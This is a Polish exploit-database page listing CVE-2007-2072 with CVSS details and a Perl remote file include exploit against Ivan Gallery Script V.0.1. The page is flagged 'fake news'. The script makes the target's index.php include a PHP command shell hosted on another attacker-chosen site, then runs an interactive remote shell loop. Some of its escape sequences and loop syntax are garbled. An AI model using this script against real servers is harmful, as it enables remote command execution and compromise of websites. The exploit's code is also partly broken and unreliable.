Ivan Gallery Script V.0.1 (index.php) Remote File Include Exploit

WARNING! Fake news / Uwaga! Nota nieprawdziwa

Ivan Gallery Script V.0.1 (index.php) Remote File Include Exploit

2007.04.19

Credit: SekoMirza & HypNosis

Risk: High

Local: No

Remote: Yes

CVE: CVE-2007-2072

CWE: CWE-Other

Ogólna skala CVSS: 7.5/10

Znaczenie: 6.4/10

Łatwość wykorzystania: 10/10

Wymagany dostęp: Zdalny

Złożoność ataku: Niska

Autoryzacja: Nie wymagana

Wpływ na poufność: Częściowy

Wpływ na integralność: Częściowy

Wpływ na dostępność: Częściowy

#!/usr/bin/perl
#
#Ivan Gallery Script V.0.1 (index.php) Remote File Include Exploit
# 
#Coded by SekoMirza & HypNosis
#
#Usage: exploit.pl [target] [cmd shell] [shell variable]
#
#Greetings: Sh4dowM4n , PhanTOmOrhcid , Starhack.0rg , CaRaMeL , MBrain! , and all Turkishz Hackerzz
#
#Vulnerable Code: include($dir.'/gallery.inc.php'); in /index.php 
#
#Vendor: http://d.turboupload.com/de/1718382/r40k9auhmy.html

use LWP::UserAgent;

$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];

if($Path!~/http:/// || $Pathtocmd!~/http:/// || !$cmdv){usage()}

head();

while()
{
       print "[shell] $";
while(<STDIN>)
       {
               $cmd=$_;
               chomp($cmd);

$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Path.'index.php?dir='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "nCould Not connectn";

$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[n]/[....]/;

if (!$cmd) {print "nPlease Enter a Commandnn"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
       {print "nCould Not Connect to cmd Host or Invalid Command Variablen";exit}
elsif ($return =~/^<br./>.<b>Fatal.error/) {print "nInvalid Command or No Returnnn"}

if($return =~ /(.*)/)

{
       $finreturn = $1;
       $finreturn=~ tr/[....]/[n]/;
       print "rn$finreturnnr";
       last;
}

else {print "[shell] $";}}}last;

sub head()
 {
 print "n=====================================================================
=======rn";
 print " *Ivan Gallery Script V.0.1 (index.php) Remote File Include Exploit*rn";
 print "=======================================================================
=====rn";
 }
sub usage()
 {
 head();
 print " Usage: exploit.pl [target] [cmd shell location] [cmd shell variable]rnn";
 print " <Site> - Full path to MXShotcast ex: http://www.site.com/ rn";
 print " <cmd shell> - Path to cmd Shell e.g http://www.different-site.com/cmd.txt rn";
 print " <cmd variable> - Command variable used in php shell rn";
 print "=======================================================================
=====rn";
 print "                           Bug Found by Sek0MirZa rn";
 print "                             www.starhack.org rn";
 print "=======================================================================
=====rn";
 exit();
 }

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Ivan Gallery Script V.0.1 (index.php) Remote File Include Exploit

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.